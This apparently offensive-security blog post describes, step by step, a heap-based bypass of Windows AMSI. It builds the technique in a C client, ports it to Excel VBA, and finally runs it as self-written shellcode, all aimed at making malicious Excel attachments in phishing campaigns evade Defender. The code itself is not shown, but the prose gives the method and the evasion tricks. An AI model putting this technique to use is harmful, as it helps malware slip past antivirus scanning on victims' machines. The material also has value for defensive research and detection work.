In order to ease debugging we will implement our own small AMSI client in C which triggers a scan on the malicious string ‘amsiutils’. This string gets flagged as evil since some AMSI Bypasses of Matt Graeber used it. Scanning this simple string depicts a simple way to check if AMSI works at all and to verify if our bypass is functional. A ready-to-use AMSI client can be found on sinn3r's github . This code provided us a good starting point and also contained important hints, e.g. the pre-condition in the Local Group Policies.

We will implement our test client using Microsoft Visual Studio Community 2017. In a first step, we end up with two functions, amsiInit() and amsiScan(), not to be confused with functions exported by amsi.dll. Later we will add another function amsiByPass() which does what its name suggests. See this gist for the final code including the bypass.



Running the program generates the following output:

This means our ‘amsiutils’ is considered as evil. Now we can proceed working on our bypass.

Understanding AMSI Structures

As promised we would like to do a heap-based bypass. But why heap-based?

At first we have to understand that using the AMSI API requires initializing a so called AMSI Context (HAMSICONTEXT). This context must be initialized using the function AmsiInitialize(). Whenever we want to scan something, e.g. by calling AmsiScanBuffer(), we have to pass our context as first parameter. If the data behind this context is invalid the related AMSI functions will fail. This is what we are after, but let's talk about that later.
Having a look at HAMSICONTEXT we will see that this type gets resolved by the pre-processor to the following:


So what we got here is a pointer to a struct called ‘HAMSICONTEXT__’. Let's have a look where this pointer points to by printing the memory address of  ‘amsiContext’ in our client. This will allow us to inspect its contents using windbg:

The variable itself is located at address 0x16a144 (note we have 32-bit program here) and its content is 0x16c8b10, that's where it points to. At address 0x16c8b10 we see some memory starting with the ASCII characters ‘AMSI’ identifying a valid AMSI context. The output below the memory field is derived via ‘!address’ which prints the memory layout of the current process.

There we can see that the address 0x16c8b10 is allocated to a region starting from 0x16c0000 to 0x16df0000 which is identified as Heap. Okay, that means AmsiInitialize() delivers us a pointer to a struct residing on the heap. A deeper look into AmsiInitialize() using IDA delivers some evidence for that:

The function allocates 16 bytes (10h) using the COM-specific API CoTaskMemAlloc(). The latter is intended to be an abstraction layer for the heap. See here and here for details. After allocating the buffer the Magic Word 0x49534D41 is written to the beginning of the block, which is nothing more than our ‘AMSI’ in ASCII.

It is noteworthy to say that an application cannot easily change this behavior. The content of the AMSI context will always be stored on the heap unless really sneaky things are done, like copying the context to somewhere else or implementing your own memory provider. This explains why Microsoft states in their API  documentation, that the application is responsible to call AmsiUnitialize() when it is done with AMSI. This is because the client cannot (should not) free that memory and the process of cleaning up is performed by the AMSI library.

Now we have understood that
  • the AMSI Context is an important data structure
  • it is always placed on the heap
  • it always starts with the ASCII characters ‘AMSI’
In case our AMSI context is corrupt, functions like AmsiScanBuffer() will fail with a return value different from zero. But what does corrupt mean, how does  AmsiScanBuffer() detect if the context is valid? Let's check that in IDA:


The function does what we already spoilered in the beginning: The first four bytes of the AMSI Context are compared against the value ‘0x49534D41’. If the comparison fails, the function returns with 0x80070057 which does not equal 0 and tells something went wrong.

Bypassing AMSI in our own AMSI Client

Our heap-based approach assumes several things to finally depict a so called bypass:

  • we have already code execution in the context of the AMSI client, e.g. by executing a VBA script
  •  The AMSI client (e.g. Excel) initializes the AMSI context only once and reuses this for every AMSI operation
  • the AMSI client rates the checked payload in case of a failure of AmsiScanBuffer() as ‘not malicious

The first point is not true for our test client but also not required because it depicts only a test vehicle which we can modify as desired.

Especially the last point is important because we will try to mess up the one and only AMSI context available in the target process. If the failure of AmsiScanBuffer() leads to negative side effects, in worst case the program might crash, the bypass will not work.

So our task is to iterate through the heap of the AMSI client process, look for chunks starting with ‘AMSI’ and mess this block up making all further AMSI operations fail.

Microsoft provides a nice code example which walks through the heap using a couple of functions from kernel32.dll.

Due to the fact that all the required information is present in user space one could do this task by parsing data structures in memory. Doing so would make the use of external functions obsolete but probably blow up our code so we decided to use the functions from the example above.

After cutting the example down to the minimum functionality we need, we end up with a function amsiByPass().


So this code retrieves the heap of the current process, iterates through it and looks at every chunk tagged as 'busy'. Within these busy chunks we check if the first bytes match our magic pattern ‘AMSI’ and if so overwrite it with some garbage.

The expectation is now that our payload is no longer flagged as malicious but the AmsiScanBuffer() function should return with a failure. Let's check that:

Okay, that's exactly what we expected. Are we done? No, not yet as we promised to provide an AMSI bypass for EXCEL/VBA so let's move on..

Bypassing AMSI in Excel using VBA

Now we will dive into the strange world of VBA. We used Microsoft Excel for Office 365 MSO (16.0.11727.20222) 32-bit for our testing.

After having written a basic POC in C we have to port this POC to VBA. VBA supports importing arbitrary external functions from DLLs so using our Heap APIs should be no problem. As far as we understood VBA, it does not allow pointer arithmetic or direct memory access. This problem can be resolved by importing a function which allows copying data from arbitrary memory locations into VBA variables. A very common function to perform this task is RtlMoveMemory().

After some code fiddling we came up with the following code.

As you can see we put some time measurement around the main loop. The number of rounds the loop may take can be several hundred thousand iterations and in addition with the poor VBA performance we expected a significant amount of time the bypass will take. Time is a crucial thing in a real attack scenario. If our phishing victim opens a malicious Excel sheet it is not acceptable that the embedded script blocks the execution for let's say more than one or two seconds. At least after 5 seconds of perceived unresponsiveness of the application a human will get impatient and do things like trying to close Excel, which is not what we want.

So let's see how long the bypass will take. To be honest, we did not expect what was happening. The result was difficult to reproduce but the measured runtime varied from 15 minutes to endless. In some rare cases Excel was closed after some minutes without any further notice. This was probably because it was unresponsive for too long. However, this isn't really something we can use in a real scenario.

Okay so what went wrong here? Is VBA really that slow? Yes, it is some orders of magnitude slower than our C code, but that does not explain what we experienced. Microsoft gives some internal details on how AMSI is implemented in Excel. It turns out that Excel uses another strategy as e.g. PowerShell does. The latter more or less sends the whole script to AmsiScanBuffer(). Excel implements a little smarter approach which is based on so called triggers. Microsoft considers pure VBA code to be harmless until the point when imports come into play. That's exactly what we do - importing functions from external DLLs. Some of these imports are treated as potentially dangerous and their call including all parameters are put into a ring buffer which is sent to AMSI. This gives AV solutions like MS defender the opportunity to check data behind addresses which of course makes sense. Let's see what data is sent to the AMSI API in our explicit case by breaking on AmsiScanBuffer using windbg:

As we can see the ring buffer contains all functions we imported including their parameter values. Our Windows 10 System has MS Defender installed and activated. So every call to AmsiScanBuffer() will bother our friend MS Defender. AMSI is implemented as In-process COM in the first place. But to finally communicate with other AV solutions it has to transport data out of process and perform a context switch. This can be seen on the next architecture overview provided by MS:

Source: https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps
The little green block on the bottom of the figure shows that our process (Excel) indirectly communicates via rpc with Defender. Hmm... Okay so this is done several 100k times, which is just too much and explains the long runtime. To provide some more evidence we repeat the bypass with Defender switched off, which should significantly speed up our bypass. In addition to that we monitor the amount of calls to AmsiScanBuffer() so we can get an impression how often it is called.

The same loop with Defender disabled took something between one and two minutes:

In a separate run we check the amount of calls to AmsiScanBuffer() using windbg:

AmsiScanBuffer() is called 124624 times (0x10000000 - 0xffe1930) which is roughly the amount of iterations our loop did. That's a lot and underlines our assumptions that AMSI is just called very often. So we understood what is going on, but currently there seems no workaround available to solve our runtime problem.

Giving up now? Not yet...

Improving AMSI Bypass in Excel

As described in the chapter above our current approach is much too slow to be used in a real scenario. So what can we do to improve this situation?

One of the functions we imported is RtlMoveMemory() which is as mentioned earlier used by a lot of malware. Monitoring this function would make a lot of sense and it might be considered as trigger. Let's verify that by just removing the call to CopyMem (the alias for RtlMoveMemory) and see what happens. This prevents our bypass from working but it might give us some insight.

The runtime is now at 0.8 seconds. Wow okay, this really made a change. It shall be noted that in this configuration we even walk through the whole heap. Due to the missing call to RtlMoveMemory() we will not find our pattern.

After we identified our bottleneck, what can we do? We will have to find an alternative method to access raw memory which is not treated as trigger by Excel. Some random Googling revealed the following function: CryptBinaryToStringA() which is part of crypt32.dll. The latter should be present on most Windows systems and thus it should be okay to import it.

The function is intended to convert strings from one format to another but it can also be used to just simply copy bytes from an arbitrary memory position we specify. Cool, that's exactly what we are after! In order to abuse this function for our purpose we call it like that to read the lpData field from the Process Heap Entry structure:
The input parameter from left to right explained:
  • phe.lpData is the source we want to copy data from,
  • ByVal 4 is the length of bytes we want to copy (lpData is 32-bit on our 32-bit Excel)
  • ByVal 2 means we want to copy raw binary (CRYPT_STRING_BINARY)
  • ByVal VarPtr(magicWord) is the target we want to copy that memory to (our VBA variable magicWord)
  • the last parameter (ByVal VarPtr(bytesWritten)) tells us how many bytes were really copied

So let's replace all occurrences of RtlMoveMemory() with CryptBinaryToStringA() and check again how long our bypass takes. You can find an updated version of the source code right here.

Our loop now takes about four seconds to finish, that is still much but it finished and it told us that it found the pattern we are looking after. Let's see how many times Excel calls AmsiScanBuffer() now with this version:


Oh my... Excel did not call AmsiScanBuffer() at all. So this means as long as there is no trigger in our code, nothing is sent to AMSI. Or the other way around: As soon as we use one single trigger function, Excel will send all calls to AMSI. Good to know...

This is the first time we can really verify if the bypass works. So let's look for some code which triggers AMSI from VBA. Iliya Dafchev shows some port of an older AMSI Bypass to VBA which gets flagged by AMSI itself in the first place. Perfect, we will put this code into a function called triggerAMSI() and use it as positive test:

After running it Excel complains as expected with a warning and just closes our current instance of Excel:

AMSI Alert by Excel - sorry for the German!
Putting our bypass and our positive test together we get the following function:


Hopes are high, that the message box containing “we survived” gets displayed because we killed AMSI before triggering it.


Great, our bypass seems to work. So let's put this into our real phishing campaign. Uhm.. just wait, how long did the whole thing take? four seconds? Repeated execution of the bypass even showed runtimes greater than ten seconds. Oh no, this is still too much.

Giving up now? Not yet...

Improving AMSI Bypass in Excel - continued

In the last chapter we improved our AMSI bypass from infinite runtime to ten seconds or below. This seems to be still too much for a real campaign (our opinion). So what can we do to speed up the whole thing one more time?

The loop takes some 100k iterations which is done in C in no time. Defender is completely out of the game. So our current runtime seems to be a pure result of the bad VBA performance. To be fair, these kind of things we are currently trying to do are not a typical VBA task so let's blame us instead of Excel for doing crazy stuff...

Anyway, what can we do now? Programming C in VBA is not an option, but what about invoking some shellcode? As long as we can import arbitrary functions the execution of shellcode should not be a problem. This code snippet shows an example how to do that within VBA. The next step is converting our VBA code (or more our initial C code) into assembly language, that is, into shellcode.

Everyone who ever wrote some pieces of shellcode and wanted to call functions from DLLs knows that the absolute addresses of these functions are not known during the time the shellcode gets assembled. This means we have to implement a mechanism like GetProcAddress() to lookup the addresses of required functions during runtime. How to do this without any library support is well understood and extensively documented so we will not go into details here. Implementing this part of the shellcode is left as an excercise for the reader.

Of course there are many ready to use code snippets which should do the job, but we decided to implement the shellcode on our own. Why? Because it is fun and self written shellcode should be unlikely to get caught by AV solutions.

The main loop of our AMSI bypass in assembly can be found here.

The structure ShellCodeEnvironment holds some important information like the looked up address of our HeapWalk() and GetProcessHeaps() function. The rest of the loop should be straight forward...

So putting everything together we generate our shellcode, put it into our VBA code and start it from there as new thread. Of course we measure the runtime again:


This time it is only 0.02 seconds!

We think this result is more than acceptable. The runtime may vary depending on the processor load or the total heap size but it should be significantly below one second which was our initial goal.

Summary

We hope you enjoyed reading this blog post. We showed the feasibility of a heap-based AMSI bypass for VBA. The same approach, with slight adaptions, also works for PowerShell and .Net 4.8. The latter also comes with AMSI support integrated in its Common Language Runtime. As per Microsoft AMSI is not a security boundary so we do not expect that much reaction but are still curious if MS will develop some detection mechanisms for this idea.

❌
❌